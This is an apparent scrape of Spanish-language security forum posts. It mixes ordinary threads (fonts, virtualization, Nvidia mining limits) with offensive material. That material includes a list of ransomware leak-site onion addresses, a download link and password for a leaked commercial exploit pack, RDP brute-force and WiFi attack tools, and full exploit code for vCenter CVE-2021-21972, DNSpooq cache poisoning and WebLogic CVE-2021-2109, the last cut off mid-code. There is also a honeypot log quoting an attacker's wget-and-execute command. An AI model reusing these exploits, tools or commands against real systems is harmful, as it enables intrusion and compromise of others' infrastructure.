   Skeena: creada por John Hudson y Paul Hanslow, parece inspirada en fuentes de distintas épocas por sus grandes variaciones entre las partes gruesas y delgadas de sus caracteres, así como por las llamativas curvas de letras como la S, la A y la J.
   Tenorite: creada por Erin McLaughlin y Wei Huang, tiene el estilo más tradicional de las cinco, como una versión modernizada de la Times New Roman con caracteres anchos y signos de puntuación muy claros.

https://twitter.com/Microsoft/status/1387421368581455874
#30
Foro Libre / Día de la Mujer (en el foro)
8 Marzo 2021, 23:59 PM
Un pequeño homenaje a todas las mujeres que han pasado por el foro, que no han sido muchas las que han reconocido ser mujeres.

- Gabirela
-  Constance
- Imoen
- Tifa (Marian Lander)
- Ap0
- Fulgencia
- Yasmesita
#31
Dark Web

   AKO (RANZY): http://37rckgo66iydpvgpwve7b2el5q2zhjw4tv4lmyewufnpx4lhkekxkoqd.onion
   AVADDON: http://avaddongun7rngel.onion
   BABYK: http://gtmx56k4hutn3ikv.onion
   CLOP: http://ekbgzchl6x2ias37.onion
   CUBA: http://cuba4mp6ximo2zlo.onion
   DARKSIDE: http://darksidedxcftmqa.onion
   DOPPLE PAYMER: hpoo4dosa3x4ognfxpqcrjwnsigvslm7kv6hvmhh2yqczaxy3j6qnwad.onion
   EGREGOR: http://egregoranrmzapcv.onion
   MOUNT LOCKER: http://mountnewsokhwilx.onion
   NEFILM (Corporate Leaks): http://hxt254aygrsziejn.onion
   PAY2KEY: http://pay2key2zkg7arp3kv3cuugdaqwuesifnbofun4j6yjdw5ry7zw2asid.onion
   RAGNAR : http://p6o7m73ujalhgkiv.onion
   RANZYLEAK / AKO: http://37rckgo66iydpvgpwve7b2el5q2zhjw4tv4lmyewufnpx4lhkekxkoqd.onion/
   RANSOMEXX (DEFRAY777): http://rnsm777cdsjrsdlbs4v5qoeppu3px6sb2igmh53jzrx7ipcrbjz5b2ad.onion
   REVIL: http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion
   SUNCRYPT: http://nbzzb6sa6xuura2z.onion

FUERA DE LÍNEA (20/02/2021)

   CONTI : htcltkjqoitnez5slo7fvhiou5lbno5bwczu7il2hmfpkowwdpj3q2yd.onion
   CONTI-NEWS (RYUK): http://fylszpcqfel7joif.onion
   EVEREST: http://ransomocmou6mnbquqz44ewosbkjk3o5qjsl3orawojexfook2j7esad.onion/
   HADES: http://ixltdyumdlthrtgx.onion
   LOCKBIT: http://lockbit-blog.com
   MAZE : xfr3txoorcyy7tikjgj5dk3rvo3vsrpyaxnclyohkbfp3h277ap4tiad.onion
   MAZE-NEWS: https://mazenews.online
   NETWALKER: http://rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion/blog
   PROLOCK: msaoyrayohnp32tcgwcanhjouetb5k54aekgnwg7dcvtgtecpumrxpqd.onion
   PYSA : http://wqmfzni2nvbbpk25.onion/partners.html
   SEKHMET: http://sekhmetleaks.top
   XINOF - RAAS (Login required): wj3b2wtj7u2bzup75tzhnso56bin6bnvsxcbwbfcuvzpc4vcixbywlid.onion



Fuente:
https://www.hackplayers.com/2021/02/sitios-cibercriminales-deepweb.html
#32
Hacking Wireless / Offensive Wifi Toolkit
3 Marzo 2021, 13:55 PM
Offensive Wifi Toolkit  - Kit de herramientas Wifi ofensivo (owt)



Utiliza aircrack-ng y mdk3



Puede ser usado en kali



- No funciona con todos los adaptadores Wifi USB ni en máquinas virtuales (VM)

Repositorio GitHub
https://github.com/clu3bot/OWT
#33
Lazy-RDP es una herramienta de escaneo y para realizar ataques de fuerza bruta junto con hydra (con diccionarios)  al Escritorio Remoto de Windows (#RDP) Puerto 3389

https://github.com/getdrive/Lazy-RDP

Permite escanear rangos con nmap o Masscan








Diccionarios  - WordLists
https://ns2.elhacker.net/wordlists/

https://github.com/emadshanab/Huge_DIR_wordlist

CitarHuge_DIR_wordlist
1:- Original size 1.1 GB txt Word-list.
2:- 45775846 lines.
3:- Compressed to 292.9 MB Zip archive.
4:- No Duplicates.
5:- Best usage with Turbo Intruder
https://github.com/PortSwigger/turbo-intruder
#34
Se ha filtrado Immunity CANVAS 7.26 kit exploits.



Más de 800 exploits incluyendo exploit spectre

Se filtró en RaidForums

Incluye White Phosphorus & D2 exploit pack

$ sha256sum Immunity\ Canvas\ 7.26/exploits/local/unix/spectre_file_leak/bin/spectre
6461d0988c835e91eb534757a9fa3ab35afe010bec7d5406d4dfb30ea767a62c  Immunity Canvas 7.26/exploits/local/unix/spectre_file_leak/bin/spectre
$ sha256sum Immunity\ Canvas\ 7.26/exploits/local/windows/spectre_sam_leak/bin/winleak_spectre.exe
ecc0f2aa29b102bf8d67b7d7173e8698c0341ddfdf9757be17595460fbf1791a  Immunity Canvas 7.26/exploits/local/windows/spectre_sam_leak/bin/winleak_spectre.exe


Funciona en:

   Linux

       Fedora 24-27

       CentOS (disabled)

       Arch Linux (disabled)

       Debian (disabled)

       Ubuntu (14.04-18.10)

   Windows

       Windows 7

       Windows 8.1

       Windows 10 (disabled)

       Windows 2008

       Windows 2012

       Windows 2016 (disabled)

Descarga:
Immunity Canvas 7.26 + White Phosphorus Exploit Pack 1.28 + D2 Exploitation Pack 2.51
https://mega.nz/file/xOgGyAIC#5ZoiK4LmNHVb3ENac3Putve8C6wi6jvCM6qEmebzsXk

Password Zip:
99z1366BB89333cza@@@#13!
#35
Fuente:
https://github.com/alt3kx/CVE-2021-21972

Código (lua) [Seleccionar]
description = [[
VMware vCenter Server CVE-2021-21972 Remote Code Execution Vulnerability

This script looks the existence of CVE-2021-21972 based on the following PATH
"/ui/vropspluginui/rest/services/uploadova" trough a POST request and looking in
response body (500) the words "uploadFile",that means the vCenter is avaiable
to accept files via POST without any restrictions

Manual inspection:
# curl -i -s -k -X $'GET'
-H $'Host: <target>'
-H $'User-Agent: alex666'
$'https://<target>/ui/vropspluginui/rest/services/getstatus'

# curl -i -s -k -X $'GET'
-H $'Host: <target>'
-H $'User-Agent: alex666'$'https://<target>/ui/vropspluginui/rest/services/uploadova'

# curl -i -s -k -X $'POST'
-H $'Host: <target>'
-H $'User-Agent: alex666'
-H $'Content-Type: application/x-www-form-urlencoded'
-H $'Content-Length: 0' $'https://<target>/ui/vropspluginui/rest/services/uploadova'

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21972'
https://www.vmware.com/security/advisories/VMSA-2021-0002.html
]]

---
-- @usage
-- nmap -p443 --script CVE-2021-21972.nse <target>
-- @output
-- PORT    STATE SERVICE
-- 443/tcp open  https
-- | CVE-2021-21972:
-- |   VULNERABLE:
-- |   vCenter 6.5-7.0 RCE
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  CVE:CVE-2021-21972
-- |       The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin.
-- |       A malicious actor with network access to port 443 may exploit this issue to execute commands with
-- |       unrestricted privileges on the underlying operating system that hosts vCenter Server.
-- |     Disclosure date: 2021-02-23
-- |     References:
-- |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21972


author = "Alex Hernandez aka alt3kx <alt3kx@protonmail.com>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"vuln", "exploit"}

local shortport = require "shortport"
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"

portrule = shortport.http

action = function(host, port)

    local vuln = {
        title = "vCenter 6.5-7.0 RCE",
        state = vulns.STATE.NOT_VULN,
        IDS = { CVE = 'CVE-2021-21972' },
description = [[
The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin.
A malicious actor with network access to port 443 may exploit this issue to execute commands with
unrestricted privileges on the underlying operating system that hosts vCenter Server.]],

references = {
           'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21972'
       },
       dates = {
           disclosure = {year = '2021', month = '02', day = '23'},
       },

    }   
   
    local report = vulns.Report:new(SCRIPT_NAME, host, port)

    local uri = "/ui/vropspluginui/rest/services/uploadova"
   
    local options = {header={}}
    options['header']['User-Agent'] = "Mozilla/5.0 (compatible; vCenter)"

    local response = http.post(host, port, uri)

    if ( response.status == 500 ) then
   
    local title = string.match(response.body, "uploadFile")

        if (title == "uploadFile") then
        vuln.state = vulns.STATE.EXPLOIT
        else
      vuln.state = vulns.STATE.NOT_VULN
      end

    end

    return report:make_output (vuln)
end

#36
¿Hay alguna manera fácil para que las mencionadas carpetas (Adobe Premiere Pro Preview Files) y Adobe Premiere Pro Auto-Save no ocupen un tamaño desorbitado?

No conozco nada la herramienta Adrobe Premiere Pro, pero veo que las carpetas

Intentaré desactivar el autoguardado, porque las susodicha carpetas ya ocupan 368GB y tampoco hay natos videos:

CitarGo to Edit > Preferences > Auto Save > Uncheck "Automatically save projects.
#37
Estoy haciendo varios proyectos virtualizando máquinas tanto el host en Windows como en Linux.

Y tengo algunas curiosidad a  ver si alguien que domine más de tema o lleve más tiempo en el mundo me puede ayudar o aconsejar.

Test 1 - Host - Centos 8 KVM - virtualizando  la misma máquina Ubuntu 64 bits las cargas suben mucho Consumo de CPU excesivo.

Test 2- Host -Centos 8 con Virtualbox - VM Ubuntu 64 funciona mucho mejor que con KVM (mismas vpcu, misma ram, mismo disco)


¿Porque el rendimiento es tan pésimo con KVM y es mucho mejor con VirtualBox? Personalmente me da igual usar KVM que VirtualBox, pero me sorprende que el rendimiento sea tan diferente, cuando se supongo que KVM es nativo.

He buscado por Google y comentan uso excesivo CPU si el guest (VM) es Windows 10, pero no es mi caso.

Y me he leído toda la documentación oficial de redHat, que por cierto es muy completa para optimizar:

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/configuring_and_managing_virtualization/index


Virtualizando la misma máquina en un host con Windows 10 y VirtualBox funciona incluso mejor que en Linux,, con las cargas del procesador más bajas.

Host - Windows 10 - virtualizando VM Ubuntu funciona correctamente rápido.

Aunque supongo que es por la Cpu es un AMD Ryzen 5 con 4 cores, 8 hilos y en Linux es Intel i5 con sólo 6 núcleos y 6 hilos
#38
Nvidia ha anunciado que las GeForce RTX 3060 se pondrán a la venta a finales de febrero con unos drivers diseñados específicamente para detectar algoritmos de minado de Ethereum (o cualquier otra moneda) y reducir el hash rate al 50 %. De esta forma el fabricante busca desincentivar la compra de esta tarjeta gráfica por parte de los profesionales que se dedican a esta labor. En su lugar, Nvidia les ofrecerá un nuevo producto llamado CMP (Cryptocurrency Mining Processor) destinado a la minería de criptomonedas.

https://blogs.nvidia.com/blog/2021/02/18/geforce-cmp/

"Diseñamos las GPU GeForce para los jugadores y los jugadores quieren más", dice Matt Wuebbling, director de marketing global de Nvidia. "Sin embargo, las GPU de Nvidia se pueden programar. Los usuarios descubren constantemente nuevas aplicaciones para ellas, desde la simulación meteorológica y la secuenciación de genes hasta el deep learning y la robótica. La minería de criptomonedas también es una de estas actividades".

"Con el lanzamiento de la GeForce RTX 3060 el 25 de febrero, daremos un importante paso para ayudar a garantizar que las tarjetas gráficas GeForce terminen en manos de los jugadores", añade Wuebbling. Este esfuerzo por parte de Nvidia pasa por lanzar la tarjeta con el mencionado driver instalado que limita la tasa de hash, es decir, su eficiencia a la hora de minar criptomonedas. De esta forma la RTX 3060, que se presenta como una tarjeta para el gran público, será un producto inútil o muy poco interesante para los mineros.

En declaraciones a PC Gamer, un portavoz de Nvidia afirma que su limitador de minado de criptomonedas no puede ser hackeado.

Pero Nvidia no quiere renunciar a los ingresos que generan los mineros de criptomonedas, así que ha diseñado un nuevo producto llamado CMP. Este procesador presenta un mejor rendimiento y la eficiencia para la minería de criptomonedas, no procesa gráficos y no tiene puerto para el monitor, una ausencia que mejora el flujo de aire y permite almacenar un mayor número de unidades. Además, la compañía ha ajustado el voltaje y las frecuencias para reducir los requisitos de energía.

Nvidia afirma que las unidades CMP no cumplen con los requisitos de las tarjetas gráficas GeForce, así que su lanzamiento "no afectará a la disponibilidad" de las GPU para jugadores. Las tarjetas CMP se pondrán a la venta en diferentes modelos a lo largo del primer y segundo trimestre del año y serán distribuidas por los habituales socios de Nvidia (ASUS, EVGA, Gigabyte, MSI, Palit...).


Fuente:
#39
Jugando con los honeypots he visto algunas cosas interesantes, aunque todo son herramientas automatizadas y no ataques de personales "reales", son todo bots.

Pero en log que pongo pues una ip China:
IP China
https://www.elhacker.net/geolocalizacion.html?host=154.223.167.54

Se bajó un binario llamado 80

CitarPATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.111.131/80; curl -O http://98.159.111.131/80; chmod +x 80; ./80

binario 80 ELF
https://www.virustotal.com/gui/file/bbbbac8f4a02d21c4643f709e355aa5ed43e98725a5c08742a4b8e295eb6f631/detection

gcc.pid ????
https://www.virustotal.com/gui/file/05b08f11a7073248fb29cfedb0ac4d4e050356b83eeaec8d7bbcd9f25b79fdbb

Top 10 comandos más utilizados:



En otra máquina resulados bastante diferentes:



Adjunto el log

Citar2021-01-28T18:37:58.692411Z [cowrie.ssh.factory.CowrieSSHFactory] New connection: 154.223.167.54:43236 (192.168.0.7:2222) [session: 1f08d81dd680]
2021-01-28T18:37:58.697484Z [HoneyPotSSHTransport,4,154.223.167.54] Remote SSH version: b'SSH-2.0-PUTTY'
2021-01-28T18:37:58.957221Z [HoneyPotSSHTransport,4,154.223.167.54] SSH client hassh fingerprint: 92674389fa1e47a27ddd8d9b63ecd42b
2021-01-28T18:37:58.962131Z [HoneyPotSSHTransport,4,154.223.167.54] kex alg, key alg: b'diffie-hellman-group14-sha1' b'ssh-rsa'
2021-01-28T18:37:58.962417Z [HoneyPotSSHTransport,4,154.223.167.54] outgoing: b'aes128-ctr' b'hmac-sha1' b'none'
2021-01-28T18:37:58.962656Z [HoneyPotSSHTransport,4,154.223.167.54] incoming: b'aes128-ctr' b'hmac-sha1' b'none'
2021-01-28T18:37:59.568103Z [HoneyPotSSHTransport,4,154.223.167.54] NEW KEYS
2021-01-28T18:37:59.818998Z [HoneyPotSSHTransport,4,154.223.167.54] starting service b'ssh-userauth'
2021-01-28T18:38:00.081545Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' trying auth b'none'
2021-01-28T18:38:00.340869Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' trying auth b'password'
2021-01-28T18:38:00.342139Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] Could not read etc/userdb.txt, default database activated
2021-01-28T18:38:00.342961Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] login attempt [b'root'/b'mucleus.caca.root'] succeeded
2021-01-28T18:38:00.346823Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] Initialized emulated server as architecture: linux-x64-lsb
2021-01-28T18:38:00.348560Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' authenticated with b'password'
2021-01-28T18:38:00.349507Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] starting service b'ssh-connection'
2021-01-28T18:38:00.603490Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:38:00.604767Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:38:00.950026Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'#!/bin/sh\nPATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\nwget http://98.159.111.131/80\ncurl -O http://98.159.111.131/80\nchmod +x 80\n./80\n'"
2021-01-28T18:38:00.952721Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.111.131/80; curl -O http://98.159.111.131/80; chmod +x 80; ./80;
2021-01-28T18:39:01.013363Z [-] exitCode: 1
2021-01-28T18:39:01.013920Z [-] sending request b'exit-status'
2021-01-28T18:39:01.015173Z [-] Closing TTY Log: var/lib/cowrie/tty/419a5f3fde27adba89708285693140846f5cf0e98a43290aa5003d8b4a4252d5 after 60 seconds
2021-01-28T18:39:01.015774Z [-] sending close 0
2021-01-28T18:39:01.519587Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:01.520955Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:39:01.521879Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:39:01.774363Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] asking for subsystem "b'sftp'"
2021-01-28T18:39:01.775031Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] {b'sftp': <class 'twisted.conch.ssh.filetransfer.FileTransferServer'>}
2021-01-28T18:39:02.500813Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] SFTP openFile: b'/bin/eyshcjdmzg'
2021-01-28T18:39:06.584852Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66161 to 64911 in channel 1
2021-01-28T18:39:10.653511Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:14.733271Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:18.811865Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:22.897300Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:26.974574Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:31.093693Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:35.187235Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:39.297588Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:43.879794Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] SFTP Uploaded file "eyshcjdmzg" to var/lib/cowrie/downloads/bbbbac8f4a02d21c4643f709e355aa5ed43e98725a5c08742a4b8e295eb6f631
2021-01-28T18:39:44.136949Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 1
2021-01-28T18:39:44.138294Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:44.139275Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:39:44.140193Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:39:44.480978Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'/bin/eyshcjdmzg'"
2021-01-28T18:39:44.483424Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: /bin/eyshcjdmzg
2021-01-28T18:39:44.485118Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Command not found: /bin/eyshcjdmzg
2021-01-28T18:39:54.752142Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0
2021-01-28T18:39:54.752851Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending request b'exit-status'
2021-01-28T18:39:54.754609Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Closing TTY Log: var/lib/cowrie/tty/27bfa685b0774a88946b7b3f3d0f6291bcc8e0ae37769309a8d086593862c0d0 after 10 seconds
2021-01-28T18:39:54.759462Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 2
2021-01-28T18:39:55.004309Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:55.296545Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:39:55.297591Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:39:56.293421Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'ls -la /var/run/gcc.pid'"
2021-01-28T18:39:56.295896Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: ls -la /var/run/gcc.pid
2021-01-28T18:39:56.297632Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Command found: ls -la /var/run/gcc.pid
2021-01-28T18:39:56.298644Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0
2021-01-28T18:39:56.298941Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending request b'exit-status'
2021-01-28T18:39:56.299253Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 3
2021-01-28T18:39:57.974393Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0
2021-01-28T18:39:57.975498Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Closing TTY Log: var/lib/cowrie/tty/e9ca076a73c58dc3b053e9f3e0249b13f1c1b47d23846405096e8c10dc3f7d26 after 1 seconds
2021-01-28T18:39:57.978774Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:57.979388Z [HoneyPotSSHTransport,4,154.223.167.54] Got remote error, code 11 reason: b''
2021-01-28T18:39:57.980313Z [HoneyPotSSHTransport,4,154.223.167.54] avatar root logging out
2021-01-28T18:39:57.980654Z [HoneyPotSSHTransport,4,154.223.167.54] connection lost
2021-01-28T18:39:57.980912Z [HoneyPotSSHTransport,4,154.223.167.54] Connection lost after 119 seconds

En Twitter y en el blog he publicado algunas de las combinaciones de contraseñas más habituales

Citar############
Top 20 COWRIE Usernames for 2021-02-11
############
   3288 b'root'|b'password'
    751 b'admin'|b'password'
    727 b'root'|b'none'
    426 b'admin'|b'none'
    252 b'Admin'|b'password'
    140 b'user'|b'password'
    124 b'Admin'|b'none'
    118 b'ubuntu'|b'password'
     96 b'nproc'|b'password'
     91 b'test'|b'password'
     80 b'postgres'|b'password'
     46 b'nagios'|b'password'
     42 b'oracle'|b'password'
     39 b'guest'|b'password'
     38 b'support'|b'password'
     38 b'Administrator'|b'password'
     30 b'git'|b'password'
     28 b'deploy'|b'password'
     24 b'ftpuser'|b'password'
     22 b'user'|b'none'



En otra ip resultados no exactamente iguales:


Y algunos gráficos completos (país, etc)

Citar1- Irlanda
2- Rusia
3- Panamá

688 ip's diferentes en apenas 9 horas
#40
PoC para DNSpooq - dnsmasq cache poisoning CVE-2020-25686 - CVE-2020-25684 - CVE-2020-25685 por Teppei Fukuda @knqyf263

For educational purposes only

https://github.com/knqyf263/dnspooq

$ docker-compose exec attacker bash
bash-5.0# python exploit.py




exploit.py

Código (python) [Seleccionar]
#!/usr/bin/python

import itertools
from scapy.all import *


def patch(dns_frame: bytearray, pseudo_hdr: bytes, dns_id: int, dport: int):
    # set dport
    dns_frame[36] = (dport >> 8) & 0xFF
    dns_frame[37] = dport & 0xFF

    # set dns_id
    dns_frame[42] = (dns_id >> 8) & 0xFF
    dns_frame[43] = dns_id & 0xFF

    # reset checksum
    dns_frame[40] = 0x00
    dns_frame[41] = 0x00

    # calc new checksum
    ck = checksum(pseudo_hdr + dns_frame[34:])
    if ck == 0:
        ck = 0xFFFF
    cs = struct.pack("!H", ck)
    dns_frame[40] = cs[0]
    dns_frame[41] = cs[1]


ftabsiz = 150
qname = "example.com"
target = "google.com"
poison = "169.254.169.254"

attacker = "10.10.0.3"
forwarder = "10.10.0.2"
cache = "10.10.0.4"

txids = range(1, 2**16)
sports = range(1025, 2**16)
candidates = itertools.product(txids, sports)

# DNS query
qd = DNSQR(qname=qname, qtype="A", qclass='IN')
req = IP(dst=forwarder) / UDP(dport=53) / DNS(id=0, rd=1, qd=qd)
dns_layer = req[DNS]

# Socket
s2 = conf.L2socket(iface="eth0")
s3 = conf.L3socket(iface="eth0")

print("Querying non-cached names...")
for i in range(ftabsiz):
    dns_layer.id = i
    s3.send(req)

print("Generating spoofed packets...")
res = Ether() / \
      IP(src=cache, dst=forwarder) / \
      UDP(sport=53, dport=0) / \
      DNS(id=0, qr=1, ra=1, qd=qd,
          an=DNSRR(rrname=qname, ttl=900, rdata=target, type="CNAME", rclass="IN") /
             DNSRR(rrname=target, ttl=900, rdata=poison, type="A", rclass="IN"))

# Optimization
dns_frame = bytearray(raw(res))
pseudo_hdr = struct.pack(
    "!4s4sHH",
    inet_pton(socket.AF_INET, res["IP"].src),
    inet_pton(socket.AF_INET, res["IP"].dst),
    socket.IPPROTO_UDP,
    len(dns_frame[34:]),
)

verify = IP(dst=forwarder) / UDP(dport=53) / DNS(rd=1, qd=DNSQR(qname=target, qtype="A", qclass='IN'))

start_time = time.time()

n_pkts = 0
for txid, sport in candidates:
    # Update TXID and UDP dst port
    patch(dns_frame, pseudo_hdr, txid, sport)
    s2.send(dns_frame)

    n_pkts += 1
    if sport == 65535:
        res = sr1(verify, verbose=0, iface="eth0", timeout=0.01)
        if res is not None and res.haslayer(DNSRR):
            print(f"Poisoned: {res[DNSRR].rrname} => {res[DNSRR].rdata}")
            break

end_time = time.time()
print(f"sent {n_pkts} responses in {end_time - start_time:.3f} seconds")

#41
- Exploit en (python3) JndiBinding  por Photubias


Código (python) [Seleccionar]
# Exploit Title: Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)
# Date: 2021-01-21
# Exploit Author: Photubias
# Vendor Advisory: [1] https://www.oracle.com/security-alerts/cpujan2021.html
# Vendor Homepage: https://www.oracle.com
# Version: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0 (fixed in JDKs 6u201, 7u191, 8u182 & 11.0.1)
# Tested on: WebLogic 14.1.1.0 with JDK-8u181 on Windows 10 20H2
# CVE: CVE-2021-2109

#!/usr/bin/env python3
'''   
  Copyright 2021 Photubias(c)

        This program is free software: you can redistribute it and/or modify
        it under the terms of the GNU General Public License as published by
        the Free Software Foundation, either version 3 of the License, or
        (at your option) any later version.

        This program is distributed in the hope that it will be useful,
        but WITHOUT ANY WARRANTY; without even the implied warranty of
        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
        GNU General Public License for more details.

        You should have received a copy of the GNU General Public License
        along with this program.  If not, see <http://www.gnu.org/licenses/>.
       
        File name CVE-2021-2109.py
        written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be

        This is a native implementation without requirements, written in Python 3.
        Works equally well on Windows as Linux (as MacOS, probably ;-)
       
        Requires JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
         from https://github.com/welk1n/JNDI-Injection-Exploit
         to be in the same folder
'''
import urllib.request, urllib.parse, http.cookiejar, ssl
import sys, os, optparse, subprocess, threading, time

## Static vars; change at will, but recommend leaving as is
sURL = 'http://192.168.0.100:7001'
iTimeout = 5
oRun = None

## Ignore unsigned certs, if any because WebLogic is default HTTP
ssl._create_default_https_context = ssl._create_unverified_context

class runJar(threading.Thread):
    def __init__(self, sJarFile, sCMD, sAddress):
        self.stdout = []
        self.stderr = ''
        self.cmd = sCMD
        self.addr = sAddress
        self.jarfile = sJarFile
        self.proc = None
        threading.Thread.__init__(self)

    def run(self):
        self.proc = subprocess.Popen(['java', '-jar', self.jarfile, '-C', self.cmd, '-A', self.addr], shell=False, stdout = subprocess.PIPE, stderr = subprocess.PIPE, universal_newlines=True)
        for line in iter(self.proc.stdout.readline, ''): self.stdout.append(line)
        for line in iter(self.proc.stderr.readline, ''): self.stderr += line
       

def findJNDI():
    sCurDir = os.getcwd()
    sFile = ''
    for file in os.listdir(sCurDir):
        if 'JNDI' in file and '.jar' in file:
            sFile = file
    print('[+] Found and using ' + sFile)
    return sFile

def findJAVA(bVerbose):
    try:
        oProc = subprocess.Popen('java -version', stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
    except:
        exit('[-] Error: java not found, needed to run the JAR file\n    Please make sure to have "java" in your path.')
    sResult = list(oProc.stdout)[0].decode()
    if bVerbose: print('[+] Found Java: ' + sResult)

def checkParams(options, args):
    if args: sHost = args[0]
    else:
        sHost = input('[?] Please enter the URL ['+sURL+'] : ')
        if sHost == '': sHost = sURL
        if sHost[-1:] == '/': sHost = sHost[:-1]
        if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost
    if options.username: sUser = options.username
    else:
